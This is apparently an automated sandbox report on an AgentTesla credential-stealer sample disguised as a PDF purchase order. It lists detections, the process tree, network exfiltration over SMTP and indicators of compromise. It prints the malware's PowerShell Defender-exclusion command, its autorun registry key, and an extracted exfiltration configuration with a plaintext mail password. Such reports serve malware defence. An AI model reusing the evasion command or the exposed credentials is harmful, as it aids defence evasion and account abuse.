Windows Analysis Report
PO-2024)bekotas.pdf.exe

Overview

General Information

Sample name:PO-2024)bekotas.pdf.exe
Analysis ID:1466697
MD5:2226b8a2ac6e61dd5bc5327d48c74e1c
SHA1:7b7b425df447fb64abfbf7fe34d336b13d8d8bb0
SHA256:72629b026d1626923f7d3280d0dabb7c1a9ee869b7ce9ec2f02c949544c8326f
Tags:AgentTesla, exe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO-2024)bekotas.pdf.exe (PID: 4440 cmdline: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • powershell.exe (PID: 3668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO-2024)bekotas.pdf.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
  • ctsdvwT.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • ctsdvwT.exe (PID: 760 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • ctsdvwT.exe (PID: 4612 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
  • ctsdvwT.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
    • ctsdvwT.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 2226B8A2AC6E61DD5BC5327D48C74E1C)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
Source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

Source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 10.2.ctsdvwT.exe.4344c70.2.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 10.2.ctsdvwT.exe.4344c70.2.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen, Strings:
  • 0x318c8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3193a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x319c4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31a56:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31ac0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31b32:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31bc8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31c58:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, NewProcessName: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, OriginalFileName: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ProcessId: 4440, ProcessName: PO-2024)bekotas.pdf.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ParentImage: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ParentProcessId: 4440, ParentProcessName: PO-2024)bekotas.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ProcessId: 3668, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ProcessId: 3452, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.167.140.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Initiated: true, ProcessId: 3452, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 64941
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ParentImage: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, ParentProcessId: 4440, ParentProcessName: PO-2024)bekotas.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe", ProcessId: 3668, ProcessName: powershell.exe
                    Timestamp:07/03/24-09:49:42.787550
                    SID:2855542
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787550
                    SID:2851779
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787550
                    SID:2840032
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787473
                    SID:2839723
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/03/24-09:49:42.787473
                    SID:2030171
                    Source Port:64941
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    AV Detection

                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, ReversingLabs: Detection: 23%
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Virustotal: Detection: 32%
                    Source: PO-2024)bekotas.pdf.exe, ReversingLabs: Detection: 23%
                    Source: PO-2024)bekotas.pdf.exe, Virustotal: Detection: 32%
                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Joe Sandbox ML: detected
                    Source: PO-2024)bekotas.pdf.exe, Joe Sandbox ML: detected
                    Source: PO-2024)bekotas.pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: PO-2024)bekotas.pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: umXx.pdbSHA256I/ source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr
                    Source: Binary string: umXx.pdb source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Code function: 4x nop then jmp 04AF4F5Ch, 0_2_04AF46FB
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 4x nop then jmp 02D44BECh, 6_2_02D4438B
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 4x nop then jmp 01834BECh, 10_2_0183438B

                    Networking

                    Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: Traffic, Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: global traffic, TCP traffic: 192.168.2.5:64941 -> 108.167.140.123:587
                    Source: Joe Sandbox View, IP Address: 108.167.140.123
                    Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
                    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic, DNS traffic detected: DNS query: mail.musabody.com
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B19000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.musabody.com
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2165652730.000000000312D000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2250775704.0000000003447000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, POq2Ux.cs, .Net Code: _4H57oeN1J
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, POq2Ux.cs, .Net Code: _4H57oeN1J
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 11_2_0613EE20 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0613FC90,00000000,00000000
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Window created: window name: CLIPBRDWNDCLASS

                    System Summary

                    Source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.4344c70.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.42a9970.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 6.2.ctsdvwT.exe.4024710.5.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.42a9970.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 6.2.ctsdvwT.exe.4024710.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 6.2.ctsdvwT.exe.3fa9990.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.4344c70.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.PO-2024)bekotas.pdf.exe.5440000.6.raw.unpack, -Module-.cs, Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                    Source: 0.2.PO-2024)bekotas.pdf.exe.2adc2f4.0.raw.unpack, -Module-.cs, Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                    Source: initial sample, Static PE information: Filename: PO-2024)bekotas.pdf.exe
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A83E9011_2_02A83E90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A841D811_2_02A841D8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0613044811_2_06130448
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06132D9811_2_06132D98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_061322B011_2_061322B0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06137FA211_2_06137FA2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06137FA811_2_06137FA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A8CC6811_2_02A8CC68
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2013203130.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2017590242.0000000005440000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameRT.dll. vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2018583918.000000000D370000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameRT.dll. vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4455043243.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe; Binary or memory string: OriginalFilenameumXx.exe> vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source (each of type: UNPACKEDPE): 6.2.ctsdvwT.exe.3fa9990.2.unpack, 10.2.ctsdvwT.exe.4344c70.2.unpack, 10.2.ctsdvwT.exe.42a9970.3.raw.unpack, 6.2.ctsdvwT.exe.4024710.5.unpack, 8.2.ctsdvwT.exe.400000.0.unpack, 10.2.ctsdvwT.exe.42a9970.3.unpack, 6.2.ctsdvwT.exe.4024710.5.raw.unpack, 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.unpack, 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.unpack, 6.2.ctsdvwT.exe.3fa9990.2.raw.unpack, 10.2.ctsdvwT.exe.4344c70.2.raw.unpack, 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: PO-2024)bekotas.pdf.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ctsdvwT.exe.5.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, ZTFEpdjP8zw.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, WnRNxU.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 2njIk.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, I5ElxL.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, QQSiOsa4hPS.cs; Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, FdHU4eb83Z7.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 3VzYbXLJt4.cs; Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, JyYiKU6SlscMNsPmbd.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, JyYiKU6SlscMNsPmbd.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, JyYiKU6SlscMNsPmbd.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: _0020.SetAccessControl
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: _0020.AddAccessRule
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: _0020.SetAccessControl
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: _0020.AddAccessRule
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: _0020.SetAccessControl
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.cs; Security API names: _0020.AddAccessRule
                    Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@14/7@1/1
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-2024)bekotas.pdf.exe.log
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Mutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Mutant created: \Sessions\1\BaseNamedObjects\HOjiqFZDFIAAWY
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0m3rxyww.oxh.ps1
                    Source: PO-2024)bekotas.pdf.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
